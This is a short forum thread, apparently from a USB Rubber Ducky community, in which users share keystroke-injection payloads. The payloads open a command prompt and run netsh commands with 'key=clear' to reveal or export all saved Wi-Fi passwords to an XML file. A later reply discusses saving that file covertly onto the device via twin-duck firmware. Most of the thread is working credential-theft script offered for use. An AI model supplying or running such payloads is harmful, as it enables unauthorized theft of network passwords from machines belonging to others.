Pandox Posted March 30, 2017 Posted March 30, 2017 i have made this payload DELAY 1000 GUI DELAY 200 ENTER STRING cmd ENTER DELAY 600 STRING netsh wlan show profiles ENTER DELAY 1000 STRING netsh wlan show profile TP-LINK_12E5 key=clear ENTER but after typing netsh wlan show profiles in cmd you will get a User Profile ( TP-LINK_12E5 ) is there anyway to automate the ducky to type the profile that is there because in my payload i already knew but when i do it in a new network, the User Profile is not going to be TP-LINK_12E5 Quote
Decoy Posted March 31, 2017 Posted March 31, 2017 Why not dump all the profiles? Try this instead: DELAY 1000 GUI DELAY 200 ENTER STRING cmd ENTER DELAY 600 STRING netsh wlan export profile key=clear ENTER This will dump all profiles and clear text wifi passwords into an xml file in whatever directory you're currently in. Quote
Pandox Posted March 31, 2017 Author Posted March 31, 2017 i dont know if you know this but is it possible to flash the ducky with the firmware so its a twinduck and just to save the .xml file on the ducky ? Quote
Decoy Posted March 31, 2017 Posted March 31, 2017 1 hour ago, Scott2906 said: i dont know if you know this but is it possible to flash the ducky with the firmware so its a twinduck and just to save the .xml file on the ducky ? Yes you can. You might be better off using PowerShell for it, but you'd just navigate to the ducky directory prior to running netsh. Quote
Decoy Posted March 31, 2017 Posted March 31, 2017 I'm pretty sure the payload already exists. Check this one out: Search the forums, you'll find a lot of payloads not officially published on the Wiki. Look at some examples, try playing with it. Good luck! Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.